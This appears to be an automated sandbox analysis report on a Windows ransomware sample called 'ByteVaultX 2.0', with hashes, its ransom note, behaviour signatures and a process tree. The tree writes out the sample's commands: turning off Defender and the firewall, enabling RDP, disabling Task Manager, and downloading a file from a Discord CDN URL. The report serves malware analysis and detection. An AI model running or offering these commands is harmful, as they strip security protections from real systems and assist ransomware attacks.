Analysis

  • max time kernel
    970s
  • max time network
    975s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240508-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240508-enlocale:en-usos:windows10-2004-x64system
  • submitted
    25/05/2024, 23:42

General

  • Target

    ByteVaultX 2.0.exe

  • Size

    9.9MB

  • MD5

    d4c033244c9bf694cf7063f136b01e30

  • SHA1

    a460178565327d0a0b756d165ff0fa3aae5f7abe

  • SHA256

    1a21a8954832306df2f9ff1b2296fbee0a079b019d3ef511ef6ec278fa9084e5

  • SHA512

    78f267f14fa35e975237c877e3de5e5e918c7f80c622ba255429f5a92572aa84a49b233f0ef36d6c65409c3297bbe14a528608cc6a843d8dc14eec7a0b27d75d

  • SSDEEP

    196608:4h7iRIk7AHkPkRJW9GNZA1HeT39Iig6eE9TFa0Z8DOjCdylNo1nz8QW7tx:hGFG8S1+TtIi+Y9Z8D8CclydoPx

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

https://cdn.discordapp.com/attachments/1181543227728330774/1244072427731025991/skulls-light-halloween-red_1.jpg?ex=6653c83c&is=665276bc&hm=31de2cb652ccec56aca0b6ecf1e9b33fd01f18e5d5d2690e68e000f0c1477ee6&

Extracted

Path

C:\Encrypt\encrypt.html

Ransom Note
Your Files Have Been Encrypted Your Files Have Been Encrypted By The ByteVaultX Test-Ransomware The price for the Decryption is $0 in Bitcoin (BTC). Follow these steps to get your decryption: You Do It. But Remember this malware is Just For VMS This is a Test Ransomware Your Files Have Been Encrypted By The ByteVaultX Test-Ransomware Ask AI How to Use the Ransomware key with the decryption algorithm (in this case, the Fernet decryption algorithm) to decrypt each encrypted file. Save the decrypted data to new files or overwrite the original encrypted files if desired. You Will Also Have To install Python and cryptography Please note that the dercyption key is in the path C:\encrypt\Key.txt and please note you have infinite time For support, you can ask ai how to encrypt your data Trustet AI

Signatures

  • Renames multiple (142) files with added filename extension

    This suggests ransomware activity of encrypting all the files on the system.

  • Blocklisted process makes network request 4 IoCs
  • Disables Task Manager via registry modification
  • Modifies Windows Firewall 2 TTPs 36 IoCs
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Loads dropped DLL 12 IoCs
  • Drops desktop.ini file(s) 8 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 60 IoCs

    Using powershell.exe command.

  • Sets desktop wallpaper using registry 2 TTPs 4 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Modifies registry class 4 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 6 IoCs
  • Suspicious use of AdjustPrivilegeToken 60 IoCs
  • Suspicious use of FindShellTrayWindow 35 IoCs
  • Suspicious use of SendNotifyMessage 34 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\ByteVaultX 2.0.exe
    "C:\Users\Admin\AppData\Local\Temp\ByteVaultX 2.0.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:2928
    • C:\Users\Admin\AppData\Local\Temp\ByteVaultX 2.0.exe
      "C:\Users\Admin\AppData\Local\Temp\ByteVaultX 2.0.exe"
      2⤵
      • Checks computer location settings
      • Loads dropped DLL
      • Drops desktop.ini file(s)
      • Suspicious use of WriteProcessMemory
      PID:2408
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        powershell -Command "Set-MpPreference -DisableRealtimeMonitoring $true"
        3⤵
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:1680
      • C:\Windows\SYSTEM32\netsh.exe
        netsh advfirewall set allprofiles state off
        3⤵
        • Modifies Windows Firewall
        PID:5572
      • C:\Windows\SYSTEM32\runas.exe
        runas /user:NT-AUTORITÄT\SYSTEM cmd.exe /c "C:\Encrypt\encrypt.bat"
        3⤵
          PID:1596
        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument C:\Encrypt\encrypt.html
          3⤵
          • Enumerates system info in registry
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
          • Suspicious use of FindShellTrayWindow
          • Suspicious use of SendNotifyMessage
          • Suspicious use of WriteProcessMemory
          PID:4068
          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xf8,0xfc,0x100,0xd4,0x104,0x7ffa121846f8,0x7ffa12184708,0x7ffa12184718
            4⤵
              PID:6112
            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2148,5292310798493132192,16021345772022231361,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2152 /prefetch:2
              4⤵
                PID:3096
              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2148,5292310798493132192,16021345772022231361,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2204 /prefetch:3
                4⤵
                • Suspicious behavior: EnumeratesProcesses
                PID:4416
              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2148,5292310798493132192,16021345772022231361,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2868 /prefetch:8
                4⤵
                  PID:2384
                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2148,5292310798493132192,16021345772022231361,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3292 /prefetch:1
                  4⤵
                    PID:1804
                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2148,5292310798493132192,16021345772022231361,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3296 /prefetch:1
                    4⤵
                      PID:2484
                    • C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
                      "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2148,5292310798493132192,16021345772022231361,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5208 /prefetch:8
                      4⤵
                        PID:3636
                      • C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
                        "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2148,5292310798493132192,16021345772022231361,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5208 /prefetch:8
                        4⤵
                        • Suspicious behavior: EnumeratesProcesses
                        PID:1596
                      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2148,5292310798493132192,16021345772022231361,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4756 /prefetch:1
                        4⤵
                          PID:1868
                        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2148,5292310798493132192,16021345772022231361,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4736 /prefetch:1
                          4⤵
                            PID:3056
                          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2148,5292310798493132192,16021345772022231361,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5036 /prefetch:1
                            4⤵
                              PID:4140
                            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2148,5292310798493132192,16021345772022231361,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5292 /prefetch:1
                              4⤵
                                PID:4136
                              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2148,5292310798493132192,16021345772022231361,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1364 /prefetch:2
                                4⤵
                                  PID:3492
                              • C:\Windows\system32\cmd.exe
                                C:\Windows\system32\cmd.exe /c ""C:\Encrypt\encrypt.bat" "
                                3⤵
                                • Suspicious use of WriteProcessMemory
                                PID:5456
                                • C:\Windows\system32\reg.exe
                                  reg query "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections"
                                  4⤵
                                    PID:4380
                                  • C:\Windows\system32\reg.exe
                                    reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections" /t REG_DWORD /d "0" /f
                                    4⤵
                                      PID:5580
                                    • C:\Windows\system32\reg.exe
                                      reg query "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr"
                                      4⤵
                                        PID:840
                                      • C:\Windows\system32\reg.exe
                                        reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d "1" /f
                                        4⤵
                                          PID:1004
                                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                          powershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"
                                          4⤵
                                          • Command and Scripting Interpreter: PowerShell
                                          • Suspicious behavior: EnumeratesProcesses
                                          • Suspicious use of AdjustPrivilegeToken
                                          PID:564
                                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                          powershell -Command "Set-MpPreference -DisableIOAVProtection $true"
                                          4⤵
                                          • Command and Scripting Interpreter: PowerShell
                                          • Suspicious behavior: EnumeratesProcesses
                                          • Suspicious use of AdjustPrivilegeToken
                                          PID:3212
                                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                          powershell -Command "Set-MpPreference -DisableScriptScanning $true"
                                          4⤵
                                          • Command and Scripting Interpreter: PowerShell
                                          • Suspicious behavior: EnumeratesProcesses
                                          • Suspicious use of AdjustPrivilegeToken
                                          PID:5260
                                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                          powershell -Command "Set-MpPreference -DisableEmailProtection $true"
                                          4⤵
                                          • Command and Scripting Interpreter: PowerShell
                                          • Suspicious behavior: EnumeratesProcesses
                                          • Suspicious use of AdjustPrivilegeToken
                                          PID:3336
                                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                          powershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"
                                          4⤵
                                          • Command and Scripting Interpreter: PowerShell
                                          • Suspicious behavior: EnumeratesProcesses
                                          • Suspicious use of AdjustPrivilegeToken
                                          PID:5776
                                        • C:\Windows\system32\netsh.exe
                                          netsh firewall set opmode disable
                                          4⤵
                                          • Modifies Windows Firewall
                                          PID:844
                                        • C:\Windows\system32\netsh.exe
                                          netsh firewall set opmode mode=DISABLE
                                          4⤵
                                          • Modifies Windows Firewall
                                          PID:4732
                                        • C:\Windows\system32\netsh.exe
                                          netsh advfirewall set currentprofile state off
                                          4⤵
                                          • Modifies Windows Firewall
                                          PID:2520
                                        • C:\Windows\system32\netsh.exe
                                          netsh advfirewall set domainprofile state off
                                          4⤵
                                          • Modifies Windows Firewall
                                          PID:5548
                                        • C:\Windows\system32\netsh.exe
                                          netsh advfirewall set privateprofile state off
                                          4⤵
                                          • Modifies Windows Firewall
                                          PID:5424
                                        • C:\Windows\system32\netsh.exe
                                          netsh advfirewall set publicprofile state off
                                          4⤵
                                          • Modifies Windows Firewall
                                          PID:5000
                                        • C:\Windows\system32\netsh.exe
                                          netsh advfirewall set allprofiles state off
                                          4⤵
                                          • Modifies Windows Firewall
                                          PID:5044
                                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                          powershell -Command "Set-MpPreference -DisableRealtimeMonitoring $true"
                                          4⤵
                                          • Command and Scripting Interpreter: PowerShell
                                          • Suspicious behavior: EnumeratesProcesses
                                          • Suspicious use of AdjustPrivilegeToken
                                          PID:4780
                                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                          powershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"
                                          4⤵
                                          • Command and Scripting Interpreter: PowerShell
                                          • Suspicious behavior: EnumeratesProcesses
                                          • Suspicious use of AdjustPrivilegeToken
                                          PID:776
                                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                          powershell -Command "Set-MpPreference -DisableIOAVProtection $true"
                                          4⤵
                                          • Command and Scripting Interpreter: PowerShell
                                          • Suspicious behavior: EnumeratesProcesses
                                          • Suspicious use of AdjustPrivilegeToken
                                          PID:5960
                                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                          powershell -Command "Set-MpPreference -DisableScriptScanning $true"
                                          4⤵
                                          • Command and Scripting Interpreter: PowerShell
                                          • Suspicious behavior: EnumeratesProcesses
                                          • Suspicious use of AdjustPrivilegeToken
                                          PID:5492
                                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                          powershell -Command "Set-MpPreference -DisableEmailProtection $true"
                                          4⤵
                                          • Command and Scripting Interpreter: PowerShell
                                          • Suspicious behavior: EnumeratesProcesses
                                          • Suspicious use of AdjustPrivilegeToken
                                          PID:2224
                                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                          powershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"
                                          4⤵
                                          • Command and Scripting Interpreter: PowerShell
                                          • Suspicious behavior: EnumeratesProcesses
                                          • Suspicious use of AdjustPrivilegeToken
                                          PID:4584
                                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                          powershell -Command "(New-Object System.Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/1181543227728330774/1244072427731025991/skulls-light-halloween-red_1.jpg?ex=6653c83c&is=665276bc&hm=31de2cb652ccec56aca0b6ecf1e9b33fd01f18e5d5d2690e68e000f0c1477ee6&', 'C:\Users\Admin\Desktop\kill.jpg')"
                                          4⤵
                                          • Blocklisted process makes network request
                                          • Command and Scripting Interpreter: PowerShell
                                          • Suspicious behavior: EnumeratesProcesses
                                          • Suspicious use of AdjustPrivilegeToken
                                          PID:2852
                                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                          powershell -Command "Start-Process 'C:\encrypt\encrypt.bat' -Verb RunAs"
                                          4⤵
                                          • Command and Scripting Interpreter: PowerShell
                                          • Modifies registry class
                                          • Suspicious behavior: EnumeratesProcesses
                                          • Suspicious use of AdjustPrivilegeToken
                                          PID:5212
                                          • C:\Windows\System32\cmd.exe
                                            "C:\Windows\System32\cmd.exe" /C "C:\encrypt\encrypt.bat"
                                            5⤵
                                              PID:3584
                                              • C:\Windows\system32\reg.exe
                                                reg query "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections"
                                                6⤵
                                                  PID:1152
                                                • C:\Windows\system32\reg.exe
                                                  reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections" /t REG_DWORD /d "0" /f
                                                  6⤵
                                                    PID:5560
                                                  • C:\Windows\system32\reg.exe
                                                    reg query "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr"
                                                    6⤵
                                                      PID:5768
                                                    • C:\Windows\system32\reg.exe
                                                      reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d "1" /f
                                                      6⤵
                                                        PID:184
                                                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                        powershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"
                                                        6⤵
                                                        • Command and Scripting Interpreter: PowerShell
                                                        • Suspicious behavior: EnumeratesProcesses
                                                        • Suspicious use of AdjustPrivilegeToken
                                                        PID:1120
                                                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                        powershell -Command "Set-MpPreference -DisableIOAVProtection $true"
                                                        6⤵
                                                        • Command and Scripting Interpreter: PowerShell
                                                        • Suspicious behavior: EnumeratesProcesses
                                                        • Suspicious use of AdjustPrivilegeToken
                                                        PID:4684
                                                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                        powershell -Command "Set-MpPreference -DisableScriptScanning $true"
                                                        6⤵
                                                        • Command and Scripting Interpreter: PowerShell
                                                        • Suspicious behavior: EnumeratesProcesses
                                                        • Suspicious use of AdjustPrivilegeToken
                                                        PID:3080
                                                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                        powershell -Command "Set-MpPreference -DisableEmailProtection $true"
                                                        6⤵
                                                        • Command and Scripting Interpreter: PowerShell
                                                        • Suspicious behavior: EnumeratesProcesses
                                                        • Suspicious use of AdjustPrivilegeToken
                                                        PID:6044
                                                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                        powershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"
                                                        6⤵
                                                        • Command and Scripting Interpreter: PowerShell
                                                        • Suspicious behavior: EnumeratesProcesses
                                                        • Suspicious use of AdjustPrivilegeToken
                                                        PID:2412
                                                      • C:\Windows\system32\netsh.exe
                                                        netsh firewall set opmode disable
                                                        6⤵
                                                        • Modifies Windows Firewall
                                                        PID:5684
                                                      • C:\Windows\system32\netsh.exe
                                                        netsh firewall set opmode mode=DISABLE
                                                        6⤵
                                                        • Modifies Windows Firewall
                                                        PID:5664
                                                      • C:\Windows\system32\netsh.exe
                                                        netsh advfirewall set currentprofile state off
                                                        6⤵
                                                        • Modifies Windows Firewall
                                                        PID:5008
                                                      • C:\Windows\system32\netsh.exe
                                                        netsh advfirewall set domainprofile state off
                                                        6⤵
                                                        • Modifies Windows Firewall
                                                        PID:5480
                                                      • C:\Windows\system32\netsh.exe
                                                        netsh advfirewall set privateprofile state off
                                                        6⤵
                                                        • Modifies Windows Firewall
                                                        PID:2852
                                                      • C:\Windows\system32\netsh.exe
                                                        netsh advfirewall set publicprofile state off
                                                        6⤵
                                                        • Modifies Windows Firewall
                                                        PID:1200
                                                      • C:\Windows\system32\netsh.exe
                                                        netsh advfirewall set allprofiles state off
                                                        6⤵
                                                        • Modifies Windows Firewall
                                                        PID:5392
                                                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                        powershell -Command "Set-MpPreference -DisableRealtimeMonitoring $true"
                                                        6⤵
                                                        • Command and Scripting Interpreter: PowerShell
                                                        • Suspicious behavior: EnumeratesProcesses
                                                        • Suspicious use of AdjustPrivilegeToken
                                                        PID:3692
                                                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                        powershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"
                                                        6⤵
                                                        • Command and Scripting Interpreter: PowerShell
                                                        • Suspicious use of AdjustPrivilegeToken
                                                        PID:816
                                                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                        powershell -Command "Set-MpPreference -DisableIOAVProtection $true"
                                                        6⤵
                                                        • Command and Scripting Interpreter: PowerShell
                                                        • Suspicious use of AdjustPrivilegeToken
                                                        PID:4240
                                                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                        powershell -Command "Set-MpPreference -DisableScriptScanning $true"
                                                        6⤵
                                                        • Command and Scripting Interpreter: PowerShell
                                                        • Suspicious use of AdjustPrivilegeToken
                                                        PID:5292
                                                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                        powershell -Command "Set-MpPreference -DisableEmailProtection $true"
                                                        6⤵
                                                        • Command and Scripting Interpreter: PowerShell
                                                        • Suspicious use of AdjustPrivilegeToken
                                                        PID:6008
                                                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                        powershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"
                                                        6⤵
                                                        • Command and Scripting Interpreter: PowerShell
                                                        • Suspicious use of AdjustPrivilegeToken
                                                        PID:5492
                                                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                        powershell -Command "(New-Object System.Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/1181543227728330774/1244072427731025991/skulls-light-halloween-red_1.jpg?ex=6653c83c&is=665276bc&hm=31de2cb652ccec56aca0b6ecf1e9b33fd01f18e5d5d2690e68e000f0c1477ee6&', 'C:\Users\Admin\Desktop\kill.jpg')"
                                                        6⤵
                                                        • Blocklisted process makes network request
                                                        • Command and Scripting Interpreter: PowerShell
                                                        • Suspicious use of AdjustPrivilegeToken
                                                        PID:5536
                                                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                        powershell -Command "Start-Process 'C:\encrypt\encrypt.bat' -Verb RunAs"
                                                        6⤵
                                                        • Command and Scripting Interpreter: PowerShell
                                                        • Modifies registry class
                                                        • Suspicious use of AdjustPrivilegeToken
                                                        PID:1804
                                                        • C:\Windows\System32\cmd.exe
                                                          "C:\Windows\System32\cmd.exe" /C "C:\encrypt\encrypt.bat"
                                                          7⤵
                                                            PID:4788
                                                            • C:\Windows\system32\reg.exe
                                                              reg query "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections"
                                                              8⤵
                                                                PID:1064
                                                              • C:\Windows\system32\reg.exe
                                                                reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections" /t REG_DWORD /d "0" /f
                                                                8⤵
                                                                  PID:1200
                                                                • C:\Windows\system32\reg.exe
                                                                  reg query "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr"
                                                                  8⤵
                                                                    PID:5284
                                                                  • C:\Windows\system32\reg.exe
                                                                    reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d "1" /f
                                                                    8⤵
                                                                      PID:1768
                                                                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                      powershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"
                                                                      8⤵
                                                                      • Command and Scripting Interpreter: PowerShell
                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                      PID:3168
                                                                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                      powershell -Command "Set-MpPreference -DisableIOAVProtection $true"
                                                                      8⤵
                                                                      • Command and Scripting Interpreter: PowerShell
                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                      PID:184
                                                                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                      powershell -Command "Set-MpPreference -DisableScriptScanning $true"
                                                                      8⤵
                                                                      • Command and Scripting Interpreter: PowerShell
                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                      PID:1800
                                                                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                      powershell -Command "Set-MpPreference -DisableEmailProtection $true"
                                                                      8⤵
                                                                      • Command and Scripting Interpreter: PowerShell
                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                      PID:4240
                                                                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                      powershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"
                                                                      8⤵
                                                                      • Command and Scripting Interpreter: PowerShell
                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                      PID:2396
                                                                    • C:\Windows\system32\netsh.exe
                                                                      netsh firewall set opmode disable
                                                                      8⤵
                                                                      • Modifies Windows Firewall
                                                                      PID:3748
                                                                    • C:\Windows\system32\netsh.exe
                                                                      netsh firewall set opmode mode=DISABLE
                                                                      8⤵
                                                                      • Modifies Windows Firewall
                                                                      PID:3604
                                                                    • C:\Windows\system32\netsh.exe
                                                                      netsh advfirewall set currentprofile state off
                                                                      8⤵
                                                                      • Modifies Windows Firewall
                                                                      PID:1608
                                                                    • C:\Windows\system32\netsh.exe
                                                                      netsh advfirewall set domainprofile state off
                                                                      8⤵
                                                                      • Modifies Windows Firewall
                                                                      PID:840
                                                                    • C:\Windows\system32\netsh.exe
                                                                      netsh advfirewall set privateprofile state off
                                                                      8⤵
                                                                      • Modifies Windows Firewall
                                                                      PID:1012
                                                                    • C:\Windows\system32\netsh.exe
                                                                      netsh advfirewall set publicprofile state off
                                                                      8⤵
                                                                      • Modifies Windows Firewall
                                                                      PID:3800
                                                                    • C:\Windows\system32\netsh.exe
                                                                      netsh advfirewall set allprofiles state off
                                                                      8⤵
                                                                      • Modifies Windows Firewall
                                                                      PID:4824
                                                                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                      powershell -Command "Set-MpPreference -DisableRealtimeMonitoring $true"
                                                                      8⤵
                                                                      • Command and Scripting Interpreter: PowerShell
                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                      PID:4592
                                                                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                      powershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"
                                                                      8⤵
                                                                      • Command and Scripting Interpreter: PowerShell
                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                      PID:2096
                                                                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                      powershell -Command "Set-MpPreference -DisableIOAVProtection $true"
                                                                      8⤵
                                                                      • Command and Scripting Interpreter: PowerShell
                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                      PID:4304
                                                                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                      powershell -Command "Set-MpPreference -DisableScriptScanning $true"
                                                                      8⤵
                                                                      • Command and Scripting Interpreter: PowerShell
                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                      PID:2740
                                                                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                      powershell -Command "Set-MpPreference -DisableEmailProtection $true"
                                                                      8⤵
                                                                      • Command and Scripting Interpreter: PowerShell
                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                      PID:3492
                                                                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                      powershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"
                                                                      8⤵
                                                                      • Command and Scripting Interpreter: PowerShell
                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                      PID:1896
